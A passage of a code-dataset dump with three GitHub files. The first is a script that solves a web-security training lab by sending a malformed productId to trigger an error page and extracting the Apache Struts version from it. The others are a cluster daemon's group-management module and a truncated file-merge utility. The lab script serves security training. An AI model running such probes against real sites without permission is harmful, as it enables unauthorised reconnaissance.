"name"}]}
+{"seq_id": "8811037141", "text": "# Information disclosure in error messages\n\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef get_version(s, url):\n\tprint('\\n[+] Trying to produce an error passing a non-integer value to productId parameter...')\n\tpath = url + '/product?productId=\"gwyo\"'\n\tprint(path)\n\tr = s.get(path)\n\ttime.sleep(1)\n\tprint(r.text)\n\tframework = r.text.encode().split(b'\\n\\n')[1].decode()\n\tprint('\\n[+] Found Framework version:\\t\\t%s' % framework)\n\ttime.sleep(1)\n\tversion = framework.replace('Apache Struts ', '')\n\treturn version\n\ndef submit_version(s, url, version):\n\tprint('[+] Trying to submit the version to solve the lab...')\n\tsubmit_path = url + '/submitSolution'\n\tsubmit_data = {\"answer\": version}\n\tr = s.post(submit_path, data=submit_data)\n\ttime.sleep(1)\n\treturn r\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: Information disclosure in error messages')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif 'Error ' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to retrieve the number version of the framework...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\tversion = get_version(s, url)\n\t\t\tr = submit_version(s, url, version)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n", "repo_name": "gwyomarch/WebSecurityAcademy", "sub_path": "InformationDisclosure/exploit-lab01.py", "file_name": "exploit-lab01.py", "file_ext": "py", "file_size_in_byte": 2644, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib3.disable_warnings", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib3.exceptions", "line_number": 12, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "requests.Session", "line_number": 56, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 61, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 64, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 67, "usage_type": "call"}, {"api_name": "urllib.parse.parse.urlparse", "line_number": 68, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 68, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 68, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 81, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 85, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "41494343522", "text": "__author__ = 'Sumit Sharma'\n__copyright__ = 'Copyright 2022, Luna2 Project'\n__license__ = 'GPL'\n__version__ = '2.0'\n__maintainer__ = 'Sumit Sharma'\n__email__ = 'sumit.sharma@clustervision.com'\n__status__ = 'Development'\n\nfrom base64 import b64encode\nfrom concurrent.futures import ThreadPoolExecutor\nfrom utils.database import Database\nfrom utils.log import Log\nfrom utils.config import Config\nfrom utils.queue import Queue\nfrom utils.helper import Helper\nfrom common.constant import CONSTANT\n\n\nclass Group():\n \"\"\"\n This class is responsible for all operations on groups.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n This constructor will initialize all required variables here.\n \"\"\"\n self.logger = Log.get_logger()\n self.plugins_path=CONSTANT[\"PLUGINS\"][\"PLUGINS_DIR\"]\n\n\n def get_all_group(self):\n \"\"\"\n This method will return all the groups in detailed format.\n \"\"\"\n groups = Database().get_record(None, 'group', None)\n if groups:\n response = {'config': {'group': {} }}\n for group in groups:\n name = group['name']\n group_id = group['id']\n group_interface = Database().get_record_join(\n ['groupinterface.interface','network.name as network','groupinterface.options'],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n if group_interface:\n group['interfaces'] = []\n for interface in group_interface:\n interface['options'] = interface['options'] or \"\"\n group['interfaces'].append(interface)\n del group['id']\n group['setupbmc'] = Helper().make_bool(group['setupbmc'])\n group['netboot'] = Helper().make_bool(group['netboot'])\n group['localinstall'] = Helper().make_bool(group['localinstall'])\n group['bootmenu'] = Helper().make_bool(group['bootmenu'])\n group['osimage'] = Database().name_by_id('osimage', group['osimageid'])\n del group['osimageid']\n if group['bmcsetupid']:\n group['bmcsetupname'] = Database().name_by_id('bmcsetup', group['bmcsetupid'])\n del group['bmcsetupid']\n response['config']['group'][name] = group\n self.logger.info('Provided list of all groups with details.')\n else:\n self.logger.error('No group is available.')\n response = 'No group is available'\n return False, response\n return True,response\n\n\n def get_group(self, name=None):\n \"\"\"\n This method will return requested group in detailed format.\n \"\"\"\n # things we have to set for a group\n items = {\n # 'prescript': '',\n # 'partscript': '',\n # 'postscript': '',\n 'setupbmc':False,\n 'netboot':False,\n 'localinstall':False,\n 'bootmenu':False,\n 'provision_interface':'BOOTIF',\n 'provision_method': 'torrent',\n 'provision_fallback': 'http'\n }\n # same as above but now specifically base64\n b64items = {'prescript': '', 'partscript': '', 'postscript': ''}\n cluster = Database().get_record(None, 'cluster', None)\n groups = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if groups:\n response = {'config': {'group': {} }}\n group = groups[0]\n group_id = group['id']\n group_interface = Database().get_record_join(\n [\n 'groupinterface.interface',\n 'network.name as network',\n 'groupinterface.options'\n ],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n if group_interface:\n group['interfaces'] = []\n for interface in group_interface:\n if not interface['options']:\n del interface['options']\n group['interfaces'].append(interface)\n del group['id']\n for key, value in items.items():\n if key in cluster[0] and ((not key in group) or (not group[key])):\n if isinstance(value, bool):\n cluster[0][key] = str(Helper().make_bool(cluster[0][key]))\n group[key] = str(cluster[0][key])\n group[key+'_source'] = 'cluster'\n elif key in group and group[key]:\n if isinstance(value, bool):\n group[key] = str(Helper().make_bool(group[key]))\n group[key+'_source'] = 'group'\n group[key] = group[key] or str(value)\n else:\n group[key] = str(value)\n group[key+'_source'] = 'default'\n try:\n for key, value in b64items.items():\n default_str = str(value)\n default_data = b64encode(default_str.encode())\n default_data = default_data.decode(\"ascii\")\n if key in group and group[key]:\n group[key] = group[key] or default_data\n group[key+'_source'] = 'group'\n else:\n group[key] = default_data\n group[key+'_source'] = 'default'\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n\n group['osimage'] = Database().name_by_id('osimage', group['osimageid'])\n del group['osimageid']\n if group['bmcsetupid']:\n group['bmcsetupname'] = Database().name_by_id('bmcsetup', group['bmcsetupid'])\n del group['bmcsetupid']\n # ---\n if group['osimagetagid']:\n group['osimagetag'] = Database().name_by_id('osimagetag', group['osimagetagid']) or 'default'\n else:\n group['osimagetag'] = 'default'\n del group['osimagetagid']\n group['osimage_source'] = 'group'\n group['bmcsetupname_source'] = 'group'\n group['osimagetag_source'] = 'group'\n if group['osimagetag'] == 'default':\n group['osimagetag_source'] = 'default'\n # ---\n response['config']['group'][name] = group\n self.logger.info(f'Returned Group {name} with Details.')\n else:\n self.logger.error('No group is available.')\n response = 'No group is available'\n return False,response\n return True,response\n\n\n def get_group_member(self, name=None):\n \"\"\"\n This method will return all the list of all the member node names for a group.\n \"\"\"\n status=False\n groups = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if groups:\n group = groups[0]\n groupid = group['id']\n response = {'config': {'group': {name: {'members': []}} }}\n node_list = Database().get_record(None, 'node', f' WHERE groupid = \"{groupid}\"')\n if node_list:\n nodes = []\n for node in node_list:\n nodes.append(node['name'])\n response['config']['group'][name]['members'] = nodes\n self.logger.info(f'Provided all group member nodes {nodes}.')\n status=True\n else:\n self.logger.error(f'Group {name} is not have any member node.')\n response = f'Group {name} is not have any member node'\n status=False\n else:\n self.logger.error(f'Group {name} is not available.')\n response = f'Group {name} is not available'\n status=False\n return status, response\n\n\n def update_group(self, name=None, request_data=None):\n \"\"\"\n This method will create or update a group.\n \"\"\"\n data = {}\n status=False\n response=\"Internal error\"\n # things we have to set for a group\n items = {\n 'prescript': '',\n 'partscript': 'bW91bnQgLXQgdG1wZnMgdG1wZnMgL3N5c3Jvb3QK',\n 'postscript': 'ZWNobyAndG1wZnMgLyB0bXBmcyBkZWZhdWx0cyAwIDAnID4+IC9zeXNyb290L2V0Yy9mc3RhYgo=',\n 'setupbmc': False,\n 'netboot': True,\n 'localinstall': False,\n 'bootmenu': False,\n 'provision_interface': 'BOOTIF'\n }\n create, update = False, False\n if request_data:\n data = request_data['config']['group'][name]\n oldgroupname = None\n group = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if group:\n group_id = group[0]['id']\n if 'newgroupname' in data:\n newgroupname = data['newgroupname']\n oldgroupname = name\n where = f' WHERE `name` = \"{newgroupname}\"'\n check_group = Database().get_record(None, 'group', where)\n if check_group:\n status=False\n return status, f'{newgroupname} Already present in database'\n else:\n data['name'] = data['newgroupname']\n del data['newgroupname']\n update = True\n else:\n if 'newgroupname' in data:\n status=False\n return status, 'Invalid request: newgroupname is not allowed while creating a new group'\n if 'interfaces' not in data:\n controller = Database().get_record_join(\n ['network.name as network'],\n ['ipaddress.tablerefid=controller.id','network.id=ipaddress.networkid'],\n ['tableref=\"controller\"', 'controller.hostname=\"controller\"']\n )\n data['interfaces']=[]\n if controller:\n data['interfaces'].append(\n {\n 'interface': 'BOOTIF',\n 'network': controller[0]['network']\n })\n create = True\n\n # we reset to make sure we don't assing something that won't work\n if 'osimage' in data:\n data['osimagetagid'] = \"default\"\n\n for key, value in items.items():\n if key in data:\n data[key] = data[key]\n if isinstance(value, bool):\n data[key] = str(Helper().bool_to_string(data[key]))\n elif create:\n data[key] = value\n if isinstance(value, bool):\n data[key] = str(Helper().bool_to_string(data[key]))\n if key in data and (not data[key]) and (key not in items):\n del data[key]\n\n if 'bmcsetupname' in data:\n bmcsetupname = data['bmcsetupname']\n data['bmcsetupid'] = Database().id_by_name('bmcsetup', data['bmcsetupname'])\n if data['bmcsetupid']:\n del data['bmcsetupname']\n else:\n status=False\n return status, f'BMC Setup {bmcsetupname} does not exist'\n if 'osimage' in data:\n osimage = data['osimage']\n data['osimageid'] = Database().id_by_name('osimage', osimage)\n if data['osimageid']:\n del data['osimage']\n else:\n status=False\n return status, f'OSimage {osimage} does not exist'\n\n new_interface = None\n if 'interfaces' in data:\n new_interface = data['interfaces']\n del data['interfaces']\n\n if 'osimagetag' in data:\n osimagetag = data['osimagetag']\n del data['osimagetag']\n if osimagetag == \"\":\n data['osimagetagid'] = \"\"\n else:\n osimagetagids = None\n if 'osimageid' in data:\n osimagetagids = Database().get_record(None, 'osimagetag', f\" WHERE osimageid = '{data['osimageid']}' AND name = '{osimagetag}'\")\n elif group and 'osimageid' in group[0]:\n osimagetagids = Database().get_record(None, 'osimagetag', f\" WHERE osimageid = '{group[0]['osimageid']}' AND name = '{osimagetag}'\")\n if osimagetagids:\n data['osimagetagid'] = osimagetagids[0]['id']\n else:\n status = False\n return status, 'Unknown tag, or osimage and tag not related'\n\n group_columns = Database().get_columns('group')\n column_check = Helper().compare_list(data, group_columns)\n if column_check:\n if update:\n where = [{\"column\": \"id\", \"value\": group_id}]\n row = Helper().make_rows(data)\n Database().update('group', row, where)\n response = f'Group {name} updated successfully'\n status=True\n if create:\n data['name'] = name\n row = Helper().make_rows(data)\n group_id = Database().insert('group', row)\n response = f'Group {name} created successfully'\n status=True\n if new_interface:\n for ifx in new_interface:\n if not 'interface' in ifx:\n status=False\n return status, 'Interface name is required for this operation'\n interface_name = ifx['interface']\n network = None\n if not 'network' in ifx:\n nwk=Database().get_record_join(\n ['network.name as network', 'network.id as networkid'],\n [\n 'network.id=groupinterface.networkid',\n 'groupinterface.groupid=group.id'\n ],\n [\n f\"`group`.name='{name}'\",\n f\"groupinterface.interface='{interface_name}'\"\n ]\n )\n if nwk and 'networkid' in nwk[0]:\n network=nwk[0]['networkid']\n else:\n network = Database().id_by_name('network', ifx['network'])\n del ifx['network']\n if network is None:\n status=False\n return status, 'Network not provided or does not exist'\n else:\n ifx['networkid'] = network\n ifx['groupid'] = group_id\n group_clause = f'groupid = \"{group_id}\"'\n # network_clause = f'networkid = \"{network}\"'\n interface_clause = f'interface = \"{interface_name}\"'\n where = f' WHERE {group_clause} AND {interface_clause}'\n # where += f' AND {interface_clause}'\n check_interface = Database().get_record(None, 'groupinterface', where)\n result, queue_id = None, None\n if not check_interface:\n row = Helper().make_rows(ifx)\n result = Database().insert('groupinterface', row)\n self.logger.info(f'Interface created => {result} .')\n queue_id, _ = Queue().add_task_to_queue(\n f'add_interface_to_group_nodes:{name}:{interface_name}',\n 'group_interface'\n )\n else: # we update only\n row = Helper().make_rows(ifx)\n where = [\n {\"column\": \"groupid\", \"value\": group_id},\n {\"column\": \"interface\", \"value\": interface_name}\n ]\n result = Database().update('groupinterface', row, where)\n self.logger.info(f'Interface updated => {result} .')\n queue_id, _ = Queue().add_task_to_queue(\n f'update_interface_for_group_nodes:{name}:{interface_name}',\n 'group_interface'\n )\n # below section takes care(in the background) the adding/renaming/deleting.\n # for adding next free ip-s will be selected. time consuming there for\n # background\n if result:\n next_id = Queue().next_task_in_queue('group_interface')\n if queue_id == next_id:\n executor = ThreadPoolExecutor(max_workers=1)\n executor.submit(Config().update_interface_on_group_nodes,name)\n executor.shutdown(wait=False)\n # Config().update_interface_on_group_nodes(name)\n\n # ---- we call the group plugin - maybe someone wants to run something after create/update?\n nodes_in_group = []\n group_details=Database().get_record_join(['node.name AS nodename'],['node.groupid=group.id'],[f\"`group`.name='{name}'\"])\n if group_details:\n for group_detail in group_details:\n nodes_in_group.append(group_detail['nodename'])\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n if oldgroupname and newgroupname:\n group_plugin().rename(name=oldgroupname, newname=newgroupname)\n elif create:\n group_plugin().postcreate(name=name, nodes=nodes_in_group)\n elif update:\n group_plugin().postupdate(name=name, nodes=nodes_in_group)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n\n else:\n status=False\n response = 'Invalid request: Columns are incorrect'\n else:\n status=False\n response = 'Invalid request: Did not receive data'\n return status, response\n\n\n def clone_group(self, name=None, request_data=None):\n \"\"\"\n This method will clone a group.\n \"\"\"\n data = {}\n status=False\n response=\"Internal error\"\n # things we have to set for a group\n items = {\n 'prescript': '',\n 'partscript': '',\n 'postscript': '',\n 'setupbmc': False,\n 'netboot': True,\n 'localinstall': False,\n 'bootmenu': False,\n }\n if request_data:\n newgroupname = None\n data = request_data['config']['group'][name]\n grp = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if grp:\n group_id = grp[0]['id']\n if 'newgroupname' in data:\n newgroupname = data['newgroupname']\n where = f' WHERE `name` = \"{newgroupname}\"'\n check_group = Database().get_record(None, 'group', where)\n if check_group:\n status=False\n return status, f'{newgroupname} Already present in database'\n data['name'] = data['newgroupname']\n del data['newgroupname']\n else:\n status=False\n return status, 'Destination group name not supplied'\n else:\n status=False,\n return status, f'Source group {name} does not exist'\n\n del grp[0]['id']\n for item in grp[0]:\n if item in data:\n data[item] = data[item]\n if item in items and isinstance(items[item], bool):\n data[item]=str(Helper().bool_to_string(data[item]))\n else:\n data[item] = grp[0][item]\n if item in items and isinstance(items[item], bool):\n data[item]=str(Helper().bool_to_string(data[item]))\n if item in items:\n data[item] = data[item] or items[item]\n if item in items and isinstance(items[item], bool):\n data[item]=str(Helper().bool_to_string(data[item]))\n if (not data[item]) and (item not in items):\n del data[item]\n if 'bmcsetupname' in data:\n bmcsetupname = data['bmcsetupname']\n data['bmcsetupid'] = Database().id_by_name('bmcsetup', data['bmcsetupname'])\n if data['bmcsetupid']:\n del data['bmcsetupname']\n else:\n status=False\n return status, f'BMC Setup {bmcsetupname} does not exist'\n if 'osimage' in data:\n osimage = data['osimage']\n del data['osimage']\n data['osimageid'] = Database().id_by_name('osimage', osimage)\n new_interface = None\n if 'interfaces' in data:\n new_interface = data['interfaces']\n del data['interfaces']\n group_columns = Database().get_columns('group')\n column_check = Helper().compare_list(data, group_columns)\n if column_check:\n row = Helper().make_rows(data)\n new_group_id = Database().insert('group', row)\n if not new_group_id:\n status=False\n return status, f'Group {newgroupname} is not created due to possible property clash'\n # response = f'Group {name} created successfully'\n response = f'Group {name} cloned as {newgroupname} successfully'\n status=True\n group_interfaces = Database().get_record_join(\n [\n 'groupinterface.interface',\n 'network.name as network',\n 'network.id as networkid',\n 'groupinterface.options'\n ],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n\n # ------ secrets ------\n secrets = Database().get_record(None, 'groupsecrets', f' WHERE groupid = \"{group_id}\"')\n for secret in secrets:\n del secret['id']\n secret['groupid'] = new_group_id\n row = Helper().make_rows(secret)\n result = Database().insert('groupsecrets', row)\n if not result:\n self.delete_group(new_group_id)\n status=False\n return status, f'Secrets copy for {newgroupname} failed'\n\n # ------ interfaces -------\n if new_interface:\n for ifx in new_interface:\n interface_name = ifx['interface']\n index = 0\n for grp_ifx in group_interfaces:\n # delete interfaces we already have\n if interface_name == grp_ifx['interface']:\n del group_interfaces[index]\n index += 1\n for ifx in new_interface:\n interface_name = ifx['interface']\n if 'network' not in ifx:\n status=False\n response=f'Network not specified for interface {interface_name}'\n break\n network = Database().id_by_name('network', ifx['network'])\n if network is None:\n status=False\n response=f'Network {network} does not exist'\n break\n else:\n ifx['networkid'] = network\n if 'options' in ifx:\n ifx['options'] = ifx['options'] or \"\"\n ifx['groupid'] = new_group_id\n del ifx['network']\n row = Helper().make_rows(ifx)\n Database().insert('groupinterface', row)\n\n if status is False:\n # rollback\n self.delete_group(new_group_id)\n return status, response\n\n for ifx in group_interfaces:\n ifx['groupid'] = new_group_id\n del ifx['network']\n row = Helper().make_rows(ifx)\n Database().insert('groupinterface', row)\n\n # ---- we call the group plugin - maybe someone wants to run something after clone?\n nodes_in_group = []\n group_details=Database().get_record_join(['node.name AS nodename'],['node.groupid=group.id'],[f\"`group`.name='{newgroupname}'\"])\n if group_details:\n for group_detail in group_details:\n nodes_in_group.append(group_detail['nodename'])\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n group_plugin().postcreate(name=newgroupname, nodes=nodes_in_group)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n else:\n response = 'Invalid request: Columns are incorrect'\n status=False\n else:\n response = 'Invalid request: Did not receive data'\n status=False\n return status, response\n\n\n def delete_group_by_name(self, name=None):\n \"\"\"\n This method will delete a group by name.\n \"\"\"\n status=False\n response=f'Group {name} not present in database'\n where = f' WHERE `name` = \"{name}\"'\n group = Database().get_record(None, 'group', where)\n if group:\n status, response=self.delete_group(group[0]['id'])\n return status, response\n\n\n def delete_group(self, groupid=None):\n \"\"\"\n This method will delete a group.\n \"\"\"\n status=False\n where = f' WHERE `id` = \"{groupid}\"'\n group = Database().get_record(None, 'group', where)\n if group:\n name=group[0]['name']\n where = [{\"column\": \"id\", \"value\": groupid}]\n Database().delete_row('group', where)\n where = [{\"column\": \"groupid\", \"value\": group[0]['id']}]\n Database().delete_row('groupinterface', where)\n Database().delete_row('groupsecrets', where)\n response = f'Group {name} removed'\n status=True\n # ---- we call the group plugin - maybe someone wants to run something after delete?\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n group_plugin().delete(name=name)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n else:\n response = 'Group not present in database'\n status=False\n return status, response\n", "repo_name": "clustervision/luna2-daemon", "sub_path": "daemon/base/group.py", "file_name": "group.py", "file_ext": "py", "file_size_in_byte": 28577, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.log.Log.get_logger", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.log.Log", "line_number": 28, "usage_type": "name"}, {"api_name": "common.constant.CONSTANT", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.database.Database", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 53, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 55, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 91, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 96, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 115, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 120, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 129, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 140, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 143, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 147, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 176, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 217, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 224, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 237, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 259, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 263, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 269, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 277, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 297, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 299, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 306, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 307, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 311, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 312, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 317, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 318, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 329, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 343, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 356, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 359, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 360, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 362, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 367, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 372, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 374, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 382, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 384, "usage_type": "call"}, {"api_name": "utils.config.Config", "line_number": 385, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 391, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 395, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 396, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 436, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 442, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 460, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 464, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 468, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 473, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 482, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 487, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 488, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 490, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 491, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 498, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 510, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 514, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 515, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 537, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 548, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 549, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 559, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 560, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 564, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 568, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 569, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 590, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 602, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 606, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 608, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 609, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 613, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 614, "usage_type": "call"}]}
+{"seq_id": "20276586436", "text": "from __future__ import print_function\n\nimport os\nfrom builtins import input\nfrom builtins import map\nfrom functools import partial\nfrom multiprocessing import Pool\n\nfrom PyAnalysisTools.base.ShellUtils import move, remove_directory, make_dirs\n\n\ndef parallel_merge(data, output_path, prefix, merge_dir=None, force=False, postfix=None, ncpu=10):\n make_dirs(output_path)\n make_dirs(merge_dir)\n if merge_dir is None:\n merge_dir = output_path\n if len(os.listdir(merge_dir)) > 0:\n do_delete = input(\"Merge directory contains already files. Shall I delete those?: [y|n]\")\n if do_delete.lower() == \"y\" or do_delete.lower() == \"yes\":\n list([remove_directory(os.path.join(merge_dir, d)) for d in os.listdir(merge_dir)])\n\n pool = Pool(processes=min(ncpu, len(data)))\n pool.map(partial(parallel_merge_wrapper, output_path=output_path, prefix=prefix,\n merge_dir=merge_dir, force=force, postfix=postfix), data.items())\n\n\ndef parallel_merge_wrapper(dict_element, output_path, prefix, merge_dir=None, force=False, postfix=None):\n process, input_file_list = dict_element\n if merge_dir is not None:\n merge_dir = os.path.join(merge_dir, process)\n merge_files(input_file_list, output_path, prefix + \"{:s}\".format(process), merge_dir, force, postfix)\n\n\ndef merge_files(input_file_list, output_path, prefix, merge_dir=None, force=False, postfix=None):\n def build_buckets(file_list):\n limit = 2. * 1024. * 1024. * 1024.\n if sum(map(os.path.getsize, file_list)) < limit:\n return [file_list]\n bucket_list = []\n tmp = []\n summed_file_size = 0.\n for file_name in file_list:\n if summed_file_size > limit:\n summed_file_size = 0.\n bucket_list.append(tmp)\n tmp = []\n summed_file_size += os.path.getsize(file_name)\n tmp.append(file_name)\n bucket_list.append(tmp)\n return bucket_list\n\n def merge(file_lists):\n import time\n time.sleep(2)\n if len([f for chunk in file_lists for f in chunk]) == 0:\n return\n for file_list in file_lists:\n merge_cmd = 'nice -n 15 hadd '\n if force:\n merge_cmd += ' -f '\n if postfix is not None:\n output_file_name = '{:s}_{:d}.{:s}.root'.format(prefix, file_lists.index(file_list), postfix)\n else:\n output_file_name = '{:s}_{:d}.root'.format(prefix, file_lists.index(file_list))\n merge_cmd += '%s %s' % (output_file_name, ' '.join(file_list))\n if not force and os.path.exists(os.path.join(output_path, output_file_name)):\n continue\n os.system(merge_cmd)\n if not merge_dir == output_path:\n move(output_file_name, 